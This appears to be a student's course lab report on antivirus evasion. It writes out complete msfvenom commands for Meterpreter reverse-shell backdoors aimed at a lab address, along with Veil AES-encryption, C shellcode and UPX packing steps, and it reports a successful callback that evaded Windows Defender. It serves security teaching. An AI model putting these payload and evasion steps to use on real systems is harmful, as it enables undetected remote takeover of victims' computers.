20212320 2023-2024-2 《网络与系统攻防技术》实验三实验报告

20212320唐力 2024-04-03 20:14:51

实验三 免杀原理与实践

1.实验内容

1.1 实践目标

  • 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧,或生成其他类型文件;
  • 通过Veil等工具对目标程序进行加壳或者其他操作来实现免杀;
  • 使用C+ShellCode编程实现免杀;
  • 用主机与虚拟机实测,在杀软开启的情况下,可运行并回连成功。

1.2 问题回答

(1)杀软是如何检测出恶意代码的?

  • 特征检测:杀软会使用已知的病毒特征或者行为模式来匹配扫描系统中的文件、进程或网络流量。这些特征通常是基于已知的病毒样本或病毒行为的模式。当杀软发现与已知特征匹配的代码或行为时,它会将其标记为恶意代码。
  • 行为检测:杀软会监视系统的行为,并寻找可能表明恶意活动的迹象,例如文件的异常操作、意外的网络通信等。这种方法可以检测出尚未被发现的恶意代码,因为它不依赖于已知的特征。
  • 启发式分析:杀软会使用启发式算法来评估文件或程序的潜在风险,而不是仅仅依赖已知的特征。这种方法可能会检测到新的恶意代码变种或未知的威胁。
  • 沙箱分析:有些杀软会使用沙箱技术,将潜在恶意代码放置在受控环境中运行,并观察其行为。通过观察代码在沙箱中的行为,杀软可以确定其是否具有恶意目的。

(2)免杀是做什么?

  • 免杀是指恶意代码开发者采取措施以避开杀软的检测,使其能够在受害者系统上运行而不被杀软拦截。这是一种常见的恶意软件攻击策略,旨在增加恶意软件的持久性和有效性。

(3)免杀的基本方法有哪些?

  • 多样性技术:通过对恶意代码进行修改或加密,使其生成的样本具有不同的哈希值或特征,从而避免被杀软检测到。
  • 代码混淆:通过对恶意代码进行混淆,使其在逻辑上保持一致性,但在静态分析时变得更加复杂和难以理解,从而增加杀软检测的难度。
  • 自动化测试:使用自动化工具来测试恶意代码对不同杀软的免疫性,以找出哪些版本的代码可以成功绕过杀软的检测。
  • 定向攻击:针对特定的杀软进行定制开发恶意代码,以利用其漏洞或弱点,从而避免被检测到。
  • 内存注入技术:将恶意代码注入到合法进程的内存中运行,以绕过文件扫描等传统杀软的检测。
  • 反调试技术:通过在恶意代码中添加反调试代码,以阻止杀软分析人员对其进行调试和逆向工程。

2.实验过程

2.1 免杀方法测试之msf

首先通过编辑器msf生成一个正常的后门程序,命令如下所示

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.216.138 LPORT=2320  -f exe > 20212320tl.exe

img

我们打开https://www.virustotal.com/gui/home/upload网站,进行检测。如下图所示,可以看到检测率为56/71,不加任何处理的后门程序大多数杀软都可以检测得到,因此我们用msf编码器对后门程序进行一次到多次的编码,查看编码后的检测效果。

img

接下来生成一次编码的程序

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.216.138 LPORT=23200 -f exe > 20212320tl_backdoor.exe

img

上传该程序进行检测。结果如下所示,

img

经过对比发现如果仅仅是通过msf编辑器对后门程序进行处理生成.exe文件并不能有效的实现免杀,在处理前后都能被大部分的杀软识别出来,甚至被检测出来的概率都增加了。

那么接下来生成其他类型的文件,来与exe文件进行对比,首先是.jar文件,如下命令

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.216.138 LPORT=2320 -f jar > 20212320tl.jar

img

传入VirusTotal检测,结果如下。较之前检测率有所下降

img

接下来生成.php文件,如下所示。

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.216.138 LPORT=2320 x > 20212320tl.php

img

传入VirusTotal检测,结果如下。检测率有所下降

img

最后我们生成py文件,如下所示

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.216.138 LPORT=2320 -f py > 20212320tl.py

img

传入VirusTotal检测,结果如下。检测率为0

img

2.2免杀方法veil

首先是安装veil,本次的安装还算顺利。最开始因为容量不够导致安装失败,要想安装成功首先必须要保障Kali机有足够的容量!。其次关于很多安装的方式,我最开始参照如下的代码,安装失败。

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

不如直接sudo apt-get install veil安装,成功。如下是一些安装过程的截图。包括中间会弹出来的python和win32。

img

img

img

安装完成后,使用如下指令进入Evasion模块。选择攻击载荷

use evasion  //或者use 1
use c/meterpreter/rev_tcp.py

如下图所示

img

接下来输入如下命令,对地址和端口进行配置,再使用generate指令生成.exe文件

selected
set LHOST 192.168.216.138
set LPORT 2320
generate

然后输入生成的文件名即可

img

导出生成的文件

cd var
cd lib
cd veil 
cd output
cd compiled
cp 20212320_veil.exe /exp3

img

将生成的程序传入VirusTotal检测,结果如下所示

img

但是发现检测率并没有那么理想

2.3免杀方法c+shellcode

使用下面指令生成一段shellcode。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.216.138 LPORT=2320 -f c

使用touch 20212320.c新建一个.c空文件并将这一段ShellCode填入,加入主函数,填完后.c文件。使用

i686-w64-mingw32-g++ 20212320.c -o 20212320.exe

但是发现检测率也不是很好

img

2.4免杀方法加壳

使用如下命令将刚刚生成的shellcode进行加壳

upx 20212320.exe -o 20212320shellcode.exe

img

但是加壳之后的检测结果反而更差了!

img

2.5免杀方法的组合使用

img

首先使用联想自带的电脑管家对实验生成的几个文件进行手动的查杀,发现均被检测出来。
为了保证安全性,就尝试给这个文件再加一层加密壳,使用如下指令。

veil
use Evasion
use python/shellcode_inject/aes_encrypt.py
generate
//选择2
//设置本虚拟机IP和任意端口

如下图所示。

img

img

接下来在生成的时候会报错,但是实际上文件已经生成了,再同之前一样进入文件目录导出来。如下图所示

img

此时再去检测,在virustotal检测已经发现检测率为0,不过我使用电脑管家还是能查出来...

img

img

2.6主机与虚拟机实测,进行回连

主机:Windows11
虚拟机:Kali2024.1
杀毒软件:联想自带的电脑管家

这里借鉴往届学长们的博客,使用python+aes_encrypt,使用如下命令生成.raw文件

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.216.138 lport=2320 -f raw -o 20212320.raw
  • raw 文件格式通常用于存储未经过任何处理或编码的原始数据,不包含任何文件头或元数据。在使用 Metasploit 的 msfvenom 生成 payload 时,可以选择不同的输出格式,包括 exe、dll、raw 等。选择 raw 格式输出,生成的文件只包含 payload 的二进制数据,没有额外的文件头或元数据。这种格式适合在特定的场景下使用,比如将 payload 嵌入到其他二进制文件中,或者与其他工具进行进一步处理。

img

然后直接将生成的.raw文件粘贴至本机中,如果还是使用nc传输的话还是会出现0kb的情况。然后可以开始进行回连。shellcode_luncher.exe需要下载。下载的链接https://gitee.com/vantler/shellcode_launcher/。结果如下图所示。

img

回连成功。接下来使用联想电脑管家查杀和Windows defender查杀,均检测不出,成功躲过杀软。virustotal的检测率也为0

img

img

img

3.遇到的问题与解决方法

问题一:shellcode_luncher.exe不能直接在Windows下的文件夹下打开终端(power shell)运行。否则会出现如下图所示的情况。运行一会就会自动结束。

img

问题一的解决方法: 使用win+r进入cmd,一步步输入文件目录再运行。参见2.6部分。PowerShell使用一种称为PowerShell语言的新语法,该语法类似于其他编程语言,具有更丰富的功能和更高级的命令。而CMD使用的是旧的MS-DOS语法,命令更加简单直接。两者有共同之处但也有很多不一样的地方。

问题二:关于veil安装失败的问题
问题二的解决方法:目前的经验是,如果容量不够必定会失败,如果按照Kali最开始的默认安装容量大概率是不够的,需要扩容。其次直接使用sudo apt-get install veil,apt -y install veil /usr/share/veil/config/setup.sh --force --silent这个命令可能不太好安装,因为是从外网连接来下,不稳定。

4.学习体会

本次实验主要围绕着免杀原理进行一些实践,包括生成不同类型的文件、加壳、多种技术的组合等,不过实践的效果发现除了生成py文件,在virustotal上都没有一个很好的检测效果。
这个实验给我一个很深的体会是:针对电脑中的恶意代码,不能完全的信任自己电脑中的杀毒软件,有些恶意代码会层层伪装,跳过杀毒软件的侦察实现其目的,更多还是要从个人出发,从源头出发,保护好自己计算机的安全。
免杀原理有一个实现方式是运行时加密。即在恶意软件执行时,使用加密技术对关键代码或数据进行加密和解密。这可以使得恶意软件在存储和传输过程中难以被检测,因为在静态分析时无法直接获取到明文代码。本次实验使用到了aes加密,也顺利通过virustotal。目前单一的免杀难以躲过杀毒软件的检测,需要多种原理结合使用。实际操作中,我们可以定期审计系统和应用程序的安全配置,记录关键操作和事件的日志,以便追踪和调查安全事件。

...全文
55 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
网络信息安全综合实验 任 务 书 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 二、 主要内容 实验一加密认证通信系统实现 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 实验二 综合扫描及安全评估 利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出 全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从 而提高系统的安全性能。 实验三 网络攻防技术 矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够 的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地 解决各种威胁。 实验四 Windows系统安全配置方案 作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往 忽视了OS的安全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方 面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此 ,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵 检测软件来加强系统的安全。 其中实验一要求编程实现,可直接调用相关功能函数完成。实验二至实验四可在机房 的网络信息安全综合实验系统上完成。 三、 进度计划 "序号 "设计(实验)内容 "完成时间 "备注 " "1 "接受任务,查阅文献,开始实 "第一天 " " " "现密码算法和认证算法 " " " "2 "完成加密认证通信系统 "第二至七天 " " "3 "上午完成综合扫描及安全评估 "第八天 " " " "实验,下午进行网络攻防实验 " " " "4 "上午完成网络攻防实验,下午 "第九天 " " " "进行系统安全配置实验 " " " "5 "撰写实验报告并验收 "第十天 " " 四、 实验成果要求 1. 要求程序能正常运行,并实现任务书要求功能。 2. 完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重 对设计思路的归纳和对问题解决过程的总结。 五、 考核方式 平时成绩+程序验收+实验报告。 学生姓名: 指导教师: 2016 年 6 月 13 日 实验报告 题 目: 网络信息安全综合实验 院 系:计算机系 班 级: 学 号: 学生姓名: 指导教师: 成 绩: 实验日期:2021 年 6 月 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 二、 实验内容 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 三、实验结果 实验一:本通信系统为用C#语言编写的P2P方式通信的系统,其具体功能如下: 1、识别本机IP地址并赋值到文本框中,产生一个随机数作为端口号,端口号范围限制在 1000到65535之间。 2、通过运用网络编程的知识尝试用产生的IP与端口号进行监听。 图1 发送方界面 图2 接收方界面 3、设置刷新区域,定时刷新好友在线,可以设置刷新间隔,启动和停止刷新。这里 可以通过拖拽VS里自带的控件"timersecond",实现计时。 4、发送消息。消息的传送是具有加密与认证的。 加密:考虑到DES的安全性问题,加密消息是采用AES方式加密的,本系统采用的是 C#封装好的AES程序,调用接口,实现对明文的加密。解密同理。 认证:认证是将明文哈希散列后采用RSA算法对其进行签名,再用公钥加密进行认证 的,其中哈希散列采用的是SHA1方式。下图为加密与认证的具体流程。 图3 加密与认证流程 图4 发送方可显示明文与密文 图5接收方解密出明文 5、可以发送文件。通过获取文本框中的文件地址,建立文件流,向接收端发送文件 。 接收端进行文件监听,接收文件,与发送文件编写过程相似,只是把"写"换成了"读"文 件。VS里自带的控件"saveFileDialog"可以帮助用户提示选择保存文件的位置。 图6 输入文件位置 图7 询问是否接受文件 图8 接收与发送文件成功 实验二:认识性实验 本实验为认识练习信息安全实验平台的部分实验。 SuperScan端口扫描实验 扫描结果如下图: 图
网络安全实验 石河子大学信息科学与技术学院 网络安全课程实验 "实验名称: "使用任选工具进行网络检测与扫描 " "学生姓名: "刘金红 " " "学 号: "05 " " "学 院: "信息科学与技术学院 " "专业年级: "计算机科学与技术专业2012级 " "指导教师: "曹传东老师 " "完成日期: " " 目录 1 实验环境 3 2 实验目的 3 3 实验步骤 3 4 实验内容 4 DOS窗口中常用网络命令的操作使用及IPCS攻击实践 4 DOS窗口中ping 命令及其常见带参数子命令的用法实践 4 DOS窗口中IPconfig 命令及其常见带参数子命令的用法实践 6 DOS窗口中nslookup命令及其常见带参数子命令的用法实践 8 DOS窗口中netstat命令及其常见带参数子命令的用法实践 10 DOS窗口中arp命令及其常见带参数子命令的用法实践 12 DOS窗口中route命令及其常见带参数子命令的用法实践 13 DOS窗口中tracert命令及其常见带参数子命令的用法实践 14 DOS窗口中ftp命令及其常见带参数子命令的用法实践 15 DOS窗口中telnet命令及其常见带参数子命令的用法实践 16 DOS窗口中sc命令及其常见带参数子命令的用法实践 20 DOS窗口中nbtstat命令及其常见带参数子命令的用法实践 22 DOS窗口中net命令及其常见带参数子命令的用法实践 24 DOS窗口中at命令及其常见带参数子命令的用法实践 25 使用课本第四章各案例中介绍的工具软件进行网络信息收集和扫描检测 25 在虚拟机系统Window200x中使用GetNTuser工具扫描本机系统上存在的用户名, 并猜解其中具有空密码和弱口令的用户;在该软件中使用自定义字典文件穷举猜 解某个用户的口令(爆破); 25 使用Port Scan 工具软件进行对某目标机开放端口的扫描; 28 在虚拟机系统中使用Shed 工具软件扫描某个目标主机的共享目录信息; 31 编译执行课本中案例4-4介绍的代码,并利用抓包工具进行验证; 32 使用漏洞扫描工具X-Scan对指定IP 地址段或单机进行全面的安全漏洞扫描和检测; 36 使用嗅探工具Win Sniffer 监听客户端登陆FTP服务器的用户和密码信息; 39 使用自选的任一款扫描工具进行网络攻击前的信息收集 42 使用CIS工具对本机系统进行安全风险评估 42 使用Superscan扫描工具实现秘密端口扫描 44 实验一:使用任选工具软件进行网络检测和扫描 1 实验环境 1台带有活动网络连接(插有网卡且工作正常)、安装有VMware虚拟机软件的PC机,其中 主机环境配置如表1-1所示: 表1-1 本机环境:主机操作系统的配置(作为客户机端) "操作系统 "Windows系列操作系统,版本均可,推荐Win7/Windows XP " "Telnet客户端 "F-Term(版本不限)或 " "工具 " " "FTP客户端工具"Cute FTP pro/Flash FXP (版本不限)或 " "Web浏览器 "IE/Mozilla FireFox(版本不限)或其他浏览器软件 " "抓包软件 "Sniffer Pro 支持千兆网卡) " "屏幕截图工具 "HyperSnap-DX (可抓滚屏的单文件版本) " "IP地址 " (机房做的) (后来改了) " 虚拟机配置如下表1-2所示: 表1-2 虚拟机环境:虚拟机操作系统的配置(作为服务器端) "操作系统 "Windows 200X Advance " " "Server,且安装配置了WWW/FTP/DNS/Telnet等网络服务 " "IP地址 " " 2 实验目的 1. 通过该实验,掌握在DOS命令窗口中常用网络命令的使用方法; 2. 通过该实验,掌握利用教程第四章介绍的各个案例中的工具软件进行网络检测扫描的 基本方法; 3. 通过该实验,掌握使用自选的一款工具软件进行网络攻击前的信息收集的基本方法; 4. 进一步加深对TCP/IP协议的理解和认识; 3 实验步骤 1. 实验前先阅读材料相关章节以及实验一参考资料(PPT及命令简介文档、实验指导书) ,充分预习,了解实验步骤并准备相关的工具软件; 2. 每个人在自己的本机系统上安装各种工具软件,以自己的虚拟机系统作为扫描目标; 3. 在各工具软件中分别进行参数设置,以实现客户机端获取靶机服务器的各种信息; 4. 在虚拟机系统中启动Sniffer Pro 或Wireshark,进行数据包捕获模式,抓取攻防双方的各种通信协议数据包,查看数 据包中的各种敏感扫描信息的报文内容; 5. 独立完成本次实验报告; 6. 实验完成后,思考以下问题,如何防范对方从网络上获得自己机器的各种信息 4
xxxxxxx 学生实习(实训)总结报告 学 院:xxxxxxxxxxxxxxxxxx 专业班级:_xxxxxxxxxx_ 学生姓名:____xxxxxxxxx_____ 学 号:xxxxxxxxxx_ 实习(实训)地点:___xxxxx____ ____________ __ 报告题目:__xxxxxxxxxxxxxxxxxxxx__________ ____ 报告日期: xxx 年 xxx月 xxx日 指导教师评语: ____________ _______________________ ______________________________________________________________________ ______________________________________________________________________ ___________________ 成绩(五级记分制):______ _______ 指导教师(签字):_____________________ xxxxx 实习(实训)任务书 设计题目:数据恢复技术应用 "学生姓名 "xxxxx " "课程名称 "xxxxx "专业班级 "xxxxx " "地 点 "xxxxx "起止时间 "xxxxx " "设 "数据恢复是在系统数据丢失或其他诸多原因而导致的灾难后,快速进" "计 "行数据恢复,以保障系统正常运行的常用手段。通过该综合训练,使" "内 "学生了解数据恢复的重要性,并认识到电磁泄漏现象引起的数据恢复" "容 ",硬件损坏、文件的删除等实现数据恢复的内容。 " "及 "要求:理解数据备份的重要性,以及磁盘数据恢复的原理,认识数据" "要 "恢复技术对信息安全的影响。能够使用数据恢复软件EasyRecovery进" "求 "行文件恢复。 " " "提高要求:能够对磁盘数据进行彻底清除。 " "设 "掌握EasyRecovery的应用; " "计 "理解磁盘分区的原理及特征; " "参 "设计利用EasyRecovery或手动方法进行数据恢复的解决方案。 " "数 " " "进 "12月19-20日:了解设计任务、掌握磁盘分区特征、熟悉工具软件;" "度 "12月21-28日:数据恢复的实施; " "要 "12月29-30日:撰写综合训练总结报告,作品检查、提交、答辩。 " "求 " " "参 "[1] 吴灏.《网络攻防技术》[M].北京:机械工业出版社,2009. " "考 "[2]胡建伟.《网络安全与保密》[M]. 西安电子科技大学出版社,2006." "资 "[3]牛少彰,江为强.《网络的攻击于防范——理论与实践》[M]. 北京: " "料 "北京邮电大学出版社,2006. " " "[4] 蒋朝惠. 《信息安全综合实验》[M]. " " "北京:中国铁道出版社,2010. " " "[5] 蒋朝惠. 《信息安全原理与技术》[M]. " " "北京:中国铁道出版社,2009. " "其 " " "它 " " "说 " " "明 "1.本表应在每次实施前一周由负责教师填写二份,院系审批后交院 " " "系办备案,一份由负责教师留用。2.若填写内容较多可另纸附后。3" " ".一题多名学生共用的,在设计内容、参数、要求等方面应有所区别 " " "。 " 系主任: 指导教师:xxxxx 年 月 日 前言 随着计算机技术的发展,同时硬盘由于其容量大价格便宜也成为人们存储数据的主要 设备。然而由于种种原因,硬盘的数据可能会被损坏,这也给个人和社会带来很大的损 失。因此,数据损坏后的数据恢复显得非常重要。虽然在数据恢复领域有很多的厂商已 经有比较成熟的技术。然而对于并不了解硬盘原理普通人来说,如果试图恢复数据,但 又无法采用很好的方法,选择正确的工具,就很难很好的恢复数据。然而不管用什么方 法进行数据恢复,都不能保证100%的能成功,所以在使用电脑时,我们应该注意数据备 份工作。 本文分析了硬盘的有关内部结构与文件存储系统以及硬盘数据损坏的有关原因,然后 介绍如何使用数据恢复软件EasyRecovery进行文件恢复。 目录 前言 I 1 设计内容及要求 1 实训内容 1 实训要求 1 2 数据恢复原理 2 3 数据恢复常见实例 4 主引导区的恢复 4 分区表破坏修复 5 DBR修复 5 文件删除后的修复 6 因病毒侵害而导致的文件丢失 6 利用EasyRecovery恢复丢失文件 7 4 总结 14 致谢 15 参考文献 16 1 设计内容及要求 硬盘数据丢失对于硬盘来说,仅仅就是硬盘上的某些地方的磁性消失。硬盘数据的丢 失的原因本来就有很多种,可能因为人的误操作而丢失,也可能是因为病毒的入侵而破 坏数据。并且

73

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧